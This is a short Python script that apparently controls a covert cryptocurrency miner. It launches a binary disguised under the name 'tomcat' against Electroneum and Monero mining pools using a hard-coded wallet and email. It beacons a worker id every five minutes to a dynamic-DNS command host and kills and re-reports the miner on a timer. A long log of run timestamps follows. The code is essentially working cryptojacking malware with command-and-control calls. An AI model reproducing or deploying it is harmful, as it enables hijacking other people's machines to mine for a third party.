import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:07.028709
#2018-02-17 16:31:05.496966
#2018-02-17 18:18:04.796377
#2018-02-17 20:04:07.261085
#2018-02-17 21:52:07.185254
#2018-02-17 23:37:05.754926
#2018-02-18 01:26:02.047898
#2018-02-18 03:13:04.759097
#2018-02-18 04:59:06.684047
#2018-02-18 06:51:05.181831
#2018-02-18 08:40:01.570348
#2018-02-18 10:26:04.866516
#2018-02-18 12:12:01.451812
#2018-02-18 13:58:04.297170
#2018-02-18 15:47:05.150554
#2018-02-18 17:38:06.497541
#2018-02-18 19:26:07.209563
#2018-02-18 21:12:04.756893
#2018-02-18 22:59:06.831654
#2018-02-19 00:47:01.292158
#2018-02-19 02:34:02.215506
#2018-02-19 04:20:07.361493
#2018-02-19 06:05:07.445920
#2018-02-19 07:52:07.001979
#2018-02-19 09:42:06.744966
#2018-02-19 11:32:08.168290
#2018-02-19 13:19:02.151692
#2018-02-19 15:07:05.227533
#2018-02-19 16:55:03.794376
#2018-02-19 18:42:01.800544
#2018-02-19 20:32:04.126552
#2018-02-19 22:20:07.386299
#2018-02-20 00:05:07.978676
#2018-02-20 01:51:01.587531
#2018-02-20 03:40:01.316221
#2018-02-20 05:26:04.404482
#2018-02-20 07:10:07.375063
#2018-02-20 08:56:05.441411
#2018-02-20 10:40:01.555901
#2018-02-20 12:25:09.175801
#2018-02-20 14:12:01.819428
#2018-02-20 15:56:01.727902
#2018-02-20 17:42:01.946621
#2018-02-20 19:32:04.906179
#2018-02-20 21:18:07.339965
#2018-02-20 23:02:05.199720
#2018-02-21 00:47:08.101010
#2018-02-21 02:33:07.421108
#2018-02-21 04:23:06.555240
#2018-02-21 06:11:04.134860
#2018-02-21 07:56:07.058555
#2018-02-21 09:42:04.659416
#2018-02-21 11:31:11.518578
#2018-02-21 13:19:01.884955
#2018-02-21 15:05:03.155977
#2018-02-21 16:54:08.930593
#2018-02-21 18:41:05.141179
#2018-02-21 20:25:09.582878
#2018-02-21 22:14:04.487227
#2018-02-22 00:04:04.444159
#2018-02-22 01:50:08.859668
#2018-02-22 03:37:03.593349
#2018-02-22 05:23:06.425858
#2018-02-22 07:07:05.289856
#2018-02-22 08:53:04.690599
#2018-02-22 10:40:10.093543
#2018-02-22 12:28:05.997607
#2018-02-22 14:13:05.939653
#2018-02-22 16:01:01.912366
#2018-02-22 17:47:04.862161
#2018-02-22 19:33:07.933698
#2018-02-22 21:25:10.373094
#2018-02-22 23:12:07.472217
#2018-02-23 00:59:05.543418
#2018-02-23 02:48:04.757139
#2018-02-23 04:37:05.396596
#2018-02-23 06:23:04.827584
#2018-02-23 08:11:01.679888
#2018-02-23 10:28:08.434217
#2018-02-23 12:22:04.458415
#2018-02-23 14:11:04.773951
#2018-02-23 16:02:01.649039
#2018-02-23 17:48:06.475239
#2018-02-23 19:34:02.043359
#2018-02-23 21:16:07.488173
#2018-02-23 23:05:06.174447
#2018-02-24 00:52:07.733398
#2018-02-24 02:48:04.110960
#2018-02-24 04:39:05.344164
#2018-02-24 06:23:01.935738
#2018-02-24 08:11:07.427883
#2018-02-24 09:55:04.044368
#2018-02-24 11:50:03.061585
#2018-02-24 13:42:08.013195
#2018-02-24 15:29:07.200989
#2018-02-24 17:23:01.784384
#2018-02-24 19:11:05.229341
#2018-02-24 20:59:06.405991
#2018-02-24 23:28:07.584359
#2018-02-25 03:39:04.853763
#2018-02-25 07:17:07.480501